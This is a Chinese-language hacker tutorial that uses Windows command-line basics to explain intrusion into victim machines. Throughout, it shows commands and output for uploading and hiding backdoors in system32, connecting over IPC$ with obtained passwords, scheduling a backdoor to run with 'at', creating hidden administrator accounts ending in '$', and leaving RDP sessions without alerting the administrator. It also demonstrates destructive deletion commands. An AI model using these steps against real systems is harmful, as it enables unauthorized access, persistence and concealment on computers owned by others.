以windows2000為例,windows xp類同.
DIR
顯示當前盤下的所有文件夾和文件.
比較常用的方法是,妳上傳壹個後門或服務端(這兒比如名字叫systems.exe)到肉雞的c:\winnt\system32下,妳想看看有沒有上傳成功.可以用DIR命令看壹下. 命令如下 :
DIR c:\winnt\system32\systems.exe
則會顯示:
2004-05-24 20:06 194,762 systems.exe
1 個文件 194,762 字節
0 個目錄 4,658,597,888 可用字節
如果妳沒有上傳成功,則顯示如下:
驅動器 C 中的卷沒有標簽。
卷的序列號是 6458-3DB8
c:\winnt\system32\的目錄
找不到文件
CD
改變當前目錄
具體看壹下下面的命令:
C:\>cd winnt //進入winnt文件夾
C:\winnt>cd system32 //進入system32 文件夾
C:\winnt\system32>cd.. //回到上壹級目錄
C:\winnt>cd..
C:\>
C:\>d: //進入D盤
D:\>e: //進入E盤
E:\>
del和deltree
DEL:刪除文件.
看下面的命令:
C:\>del c:\xx\ww.txt //刪除C盤的XX目錄下的名叫WW的文件.
C:\>
C:\>del c:\xx\*.* //刪除C盤的XX目錄下所有文件
deltree
這個更具有破壞性,不但能刪除所有文件,連文件夾也刪除
C:\>deltree c:\winnt //刪除C盤下的winnt所有文件和文件夾.
這個大家要小心使用.
attrid
顯示和更改文件或文件夾屬性.
文件或文件夾的屬性有 隱藏,用字母H表示. 只讀,用R表示. 存檔,用A表示. 系統,用S表示
改變壹個文件或文件夾屬性, " + " 表示增加, " - ",表示去掉某個屬性.
平時我們都把後門或服務端到上傳肉雞的c:\winnt\system32下.在進入了肉雞的CMD以後,為了更加的不讓肉雞管理員知道,我們可以把妳上傳的隱藏起來.比如還是上面的systems.exe
命令如下:
C:\>attrid +h c:\winnt\system32\systems.exe //這樣在system32下就找不到systems.exe
C:\>attrid -h c:\winnt\system32\systems.exe //去掉systems.exe的隱藏屬性
copy
復制壹個或多個文件到其它目錄
比如妳把C盤下壹個叫1.txt文件復制到D盤的vv文件夾下,
C:\>copy c:\1.txt d:\vv\1.exe
比如妳和肉雞建立了IPC$連接(如何連接?以後會講的),而且肉雞開放了***享,這裏比如開放了D盤.妳可以把妳C盤下的壹個叫systems.exe的後門或服務端上傳肉雞的D盤下,命令如下:
C:\>copy c:\systems.exe \\肉雞IP\d$
type
顯示文件內容
我現在在我的C盤的XX目錄下新建壹個叫hack.txt的文件,內容是壹些臺灣的IP
命令如下:
C:\>type c:\xx\hack.txt
序號 開始IP地址 結束IP地址 國家/省/直轄市 城市/區縣/組織
58 024.179.140.000 024.179.150.255 中國臺灣省
80 061.013.000.000 061.013.255.255 中國臺灣省
86 061.058.065.000 061.058.070.255 中國臺灣省
87 061.059.160.000 061.059.255.255 中國臺灣省
89 061.070.100.000 061.070.150.255 中國臺灣省
1788 061.217.179.000 061.217.179.255 中國臺灣省 臺南市
1789 061.216.000.000 061.219.255.255 中國臺灣省
1790 061.220.080.000 061.220.150.255 中國臺灣省 臺北市
1791 061.224.000.000 061.224.255.255 中國臺灣省 臺北市
1792 061.225.000.000 061.225.255.255 中國臺灣省
3390 134.208.000.000 134.208.255.255 中國臺灣省
3584 139.175.000.000 139.175.255.255 中國臺灣省
3590 140.092.000.000 140.092.255.255 中國臺灣省
3593 140.096.000.000 140.096.255.255 中國臺灣省
3596 140.112.000.000 140.112.255.255 中國臺灣省 臺灣大學
C:\>
它還有壹個用法,就是在進入肉雞的CMD以後,看看肉雞用的是什麽操作系統,命令如下,在我電腦操作的結果如下:
C:\>type c:\boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"
/fastdetect
看出來沒有?,我用的是XP系統.
這是壹些我認為常用的命令,其它的還有rd,md等.妳們有興趣可以找資料看看.平進比較少用.
ping
這個是用的最多的命令.可是現在好像不靈光了.大多數網站和個人電腦用防火墻屏蔽了ping.大多數時候根本是P不通.基本命令:
ping ip
ping 網址
下面P的是本站:
C:\>ping www.hf110.com
Pinging www.hf110.com [218.89.0.231] with 32 bytes of data:
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Reply from 218.89.0.231: bytes=32 time=66ms TTL=116
Reply from 218.89.0.231: bytes=32 time=67ms TTL=116
Ping statistics for 218.89.0.231:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 66ms, Maximum = 67ms, Average = 66ms
上面P出本站的IP是218.89.0.231,從TTL=116.大略看出使用的是windows操作系統.壹般來說TTL值在128左右的是windows操作系統,值在225左右的,大多數是unix類系統.但是還有特殊情況,管理員可能會通過改註冊表來修改TTL值.
net use
在得到肉雞的用戶名和密碼這後,可以用這個命令做IPC$連接
net use \\肉雞ip\ipc$ "密碼" /user:"用戶名"
連接成功後,上傳後門或服務端,(比如叫systems.exe,在妳的D盤下).
copy D:\systems.exe \\肉雞ip\c$ //這裏它要開放***享,妳才能上傳.否則無法上傳成功.
net time \\肉雞ip //看壹下肉雞的時間,是24小時制.比如這兒是下午3點10分.寫作15:10
at \\肉雞ip 15:12 systems.exe //在15:12分,運行systems.exe
在這兒,妳上傳的是反彈木馬的話,可以等著它來連接妳.其實在入侵過程中,有很多的偶然性,比如上面的,妳可以IPC連接成功.但是並壹定能夠通過net time \\肉雞ip ,看肉雞時間.就算能看到時間吧,有時肉雞的at服務並沒有打開.就算打開了,但是後門或服務端不壹定能夠有機會運行,
可能被殺毒軟件查殺.所以在入侵過程中,失敗是常有的事.這個方法不行,可以另壹種.
net user
查看用戶或新建壹個用戶.
這是在我電腦上的截圖
C:\>net user
\\BILLGATES 的用戶帳戶
---------------------------------------------------------------------
Guest guest1 HelpAssistant
SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
上面是我所有的用戶.
現在我新建壹個setwell的用戶,密碼是123456, 截圖如下
C:\>net user setwell 123456 /add
命令成功完成。
C:\>net localgroup administrators setwell /add //這條命令是加setwell為管理員
命令成功完成。
接下來我們再net user ,載圖如下
C:\>net user
\\BILLGATES 的用戶帳戶
----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
建立的用戶可以用net user命令看到,我們在用戶後面加個$,可以小小的隱藏壹下.這次建壹個叫set的用戶,截圖如下:
C:\>net user set$ 123456 /add
命令成功完成。
C:\>net localgroup administrators set$ /add
命令成功完成。
C:\>net user
\\BILLGATES 的用戶帳戶
-----------------------------------------------------------------
Guest guest1 HelpAssistant
setwell SUPPORT_388945a0 yhkj
命令成功完成。
C:\>
看到沒有,我們沒有看到剛才建立的用戶set$,可以用這個命令看,net localgroup administrators ,這個命令的是顯示所有的管理員,截圖如下:
C:\>net localgroup administrators
別名 administrators
註釋 管理員對計算機/域有不受限制的完全訪問權
成員
------------------------------------------------------
guest1
set$
setwell
yhkj
命令成功完成。
C:\>
看到沒有,我們看到set$這個用戶了.
如果要刪除用戶用這個命令:
C:\>net user setwell /delete
net start
1.啟動某些服務
比如: net start telnet //啟動telnet服務
2.查看當前啟動了什麽服務.看看我的電腦啟動了什麽服務:
C:\>net start
已經啟動以下 Windows 服務:
Automatic Updates
COM+ Event System
Cryptographic Services
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Messenger
這只是壹部分服務.
net stop
停止某些服務.站長今天也說到了.我不多了.
net share
查看默認***享.也就是查看這些***享C$ D$ e$ f$ admin$ ipc$,這是系統默認的.我的全部關了,我
到肉雞上截張圖吧.
C:\Documents and Settings\Administrator>net share
D$ D:\ 默認***享
F$ F:\ 默認***享
ADMIN$ C:\WINNT 遠程管理
C$ C:\ 默認***享
E$ E:\ 默認***享
命令成功完成。
C:\Documents and Settings\Administrator>
這個肉雞的IPC$***享竟然關了.
net view
也是查看***享,但不是上面的默認***享了,還是來張截圖吧.也是肉雞的,
C:\Documents and Settings\Administrator>net view
服務器名稱 註釋
-------------------------------------------------------------------------------
\\17
\\HMZ
\\ZGH
命令成功完成。
C:\Documents and Settings\Administrator>
學DOS命令看起來有點煩,其實是挺容易學的.而且學好了,在入侵中,會起到舉足輕重的作用.下次講netstat 等命令.
netstat -an
使用這個命令可以察看到和本機的所有的連接.看壹下在我電腦上的截圖,
D:\>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 180.254.158.42:139 0.0.0.0:0 LISTENING
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1035 *:*
UDP 0.0.0.0:1037 *:*
UDP 0.0.0.0:1134 *:*
UDP 0.0.0.0:1136 *:*
Proto Local Address Foreign Address State
協議 本地端口及IP地址 遠程端口及IP地址 狀態
LISTENING 監聽狀態 表示等待對方連接
ESTABLISHED 正在連接著.
TCP 協議是TCP
UDP 協議是UDP
TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED
這個表示 利用tcp協議 本機ip(218.95.49.187通過端口:2935 和遠程ip(218.89.0.231)端口:80連接
query
這個命令只有在開了3389端口(也不壹定端口是3389,說不定改成別的端口了.嚴格講應是開了遠程終端服務)的機子,才能用上.我用1$的用戶名上了壹臺3389機子,看壹下截圖:
c:\>query user
USERNAME SESSIONNAME ID STATE
administrator console 0 運行中
1$ rdp-tcp#2 1 運行中
看到上面沒有,管理員也在,如果妳要退出的話,就用如下命令:
logoff ID 這兒是logoff 1.
這是正常退出的.說到退出,還有壹個辦法,就是在開始---關機---註銷1$.如果妳用另外的方法退出的話,那麽肉雞在關機時,會出現類如"有壹個其它客人登錄到這臺服務器,如果妳退出,對方的會話數據會丟失"壹類的話.這樣管理員就會發現了.